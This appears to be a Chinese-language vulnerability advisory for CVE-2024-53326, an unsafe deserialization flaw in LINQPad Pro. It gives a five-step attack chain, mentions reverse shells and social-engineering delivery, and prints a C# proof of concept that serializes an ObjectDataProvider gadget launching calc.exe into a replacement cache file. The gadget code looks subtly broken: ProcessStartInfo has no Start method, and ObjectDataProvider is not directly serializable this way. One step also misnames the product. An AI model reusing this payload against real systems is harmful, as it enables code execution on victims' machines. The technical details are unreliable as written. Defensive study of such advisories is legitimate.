CVE-2024-53326 LINQPad 不安全反序列化致代码执行

漏洞信息

漏洞编号

CVE-2024-53326

漏洞类型

不安全反序列化

CVSS评分

7.3 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

LINQPad Pro

漏洞概述

CVE-2024-53326 是存在于 LINQPad Pro 5.52.01 之前版本中的高危漏洞。该漏洞源于 `LINQPad.AutoRefManager::PopulateFromCache()` 方法存在不安全的反序列化缺陷。攻击者可利用此漏洞，通过诱导本地用户执行特定操作，触发恶意数据的反序列化过程，从而在目标系统上执行任意代码，可能导致系统被完全控制。

技术细节

该漏洞的核心在于 LINQPad 的自动引用管理器在恢复缓存数据时使用了不安全的反序列化机制。`PopulateFromCache()` 方法直接对缓存文件进行反序列化操作，而未对数据来源进行严格的安全验证或类型限制（Binder）。攻击者可以构造包含恶意 Gadget 链（如利用 `System.Windows.Data.ObjectDataProvider` 和 `System.Diagnostics.Process`）的二进制数据流。当低权限用户（PR:L）在本地环境（AV:L）中触发 LINQPad 加载该缓存文件时，应用程序会解析恶意对象并调用相关方法，最终导致任意命令执行。由于需要用户交互（UI:R），攻击通常结合社会工程学手段进行。

攻击链分析

STEP 1

侦察

攻击者确认目标系统使用的是 LINQPad Pro 5.52.01 之前的版本。

STEP 2

武器化

攻击者编写 C# 代码，利用 .NET Gadget 链（如 ObjectDataProvider）构造包含恶意命令（如启动计算器或反弹 Shell）的二进制序列化数据。

STEP 3

投递

攻击者通过物理接触或社会工程学手段，将生成的恶意文件替换到 LINQPad 的特定缓存目录中，或诱导用户下载并覆盖配置文件。

STEP 4

利用

当目标用户打开 LINQPad 或执行触发 `AutoRefManager::PopulateFromCache()` 的操作时，应用程序会尝试加载被篡改的缓存文件。

STEP 5

执行

LINQPen 在反序列化过程中实例化恶意对象，系统执行攻击者预设的任意代码，攻击者获得当前用户的系统权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC Concept for CVE-2024-53326
 * Generates a malicious payload exploiting unsafe deserialization.
 * Note: The actual exploit requires placing the payload in LINQPad's cache path.
 */

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Windows.Data;

public class Exploit
{
    public static void Main(string[] args)
    {
        // 1. Create the gadget chain: ObjectDataProvider -> ProcessStartInfo
        ObjectDataProvider odp = new ObjectDataProvider();
        odp.MethodName = "Start";
        odp.ObjectInstance = new ProcessStartInfo("cmd.exe", "/c calc.exe");

        // 2. Serialize the object to a binary stream
        BinaryFormatter formatter = new BinaryFormatter();
        string filePath = "malicious_cache.bin";

        using (FileStream stream = new FileStream(filePath, FileMode.Create))
        {
            formatter.Serialize(stream, odp);
        }

        Console.WriteLine($"[+] Malicious payload generated at: {Path.GetFullPath(filePath)}");
        Console.WriteLine("[+] To exploit: Replace the legitimate LINQPad cache file with this file.");
        Console.WriteLine("[+] Trigger the vulnerability by opening LINQPad.");
    }
}

影响范围

LINQPad Pro < 5.52.01

防御指南

临时缓解措施

如果无法立即升级，应严格限制用户对 LINQPad 配置文件和缓存目录的访问权限，避免运行来源不明的 LINQPad 查询文件或脚本，并在防火墙层面阻断不必要的出站连接以防止潜在恶意回连。